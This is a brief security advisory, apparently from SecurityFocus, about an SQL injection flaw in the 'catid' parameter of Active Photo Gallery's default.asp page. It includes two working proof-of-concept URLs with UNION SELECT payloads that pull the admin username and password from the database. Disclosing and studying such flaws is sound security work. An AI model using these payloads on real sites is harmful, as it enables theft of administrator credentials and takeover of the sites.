Active Photo Gallery Default.ASP SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following proof-of-concept URIs are available:

http://www.example.com/default.asp?catid=-1+union+select+0,adminname,2+from+admins%20where%20adminid=1
http://www.example.com/default.asp?catid=-1+union+select+0,password,2+from+admins%20where%20adminid=1


 

Privacy Statement
Copyright 2010, SecurityFocus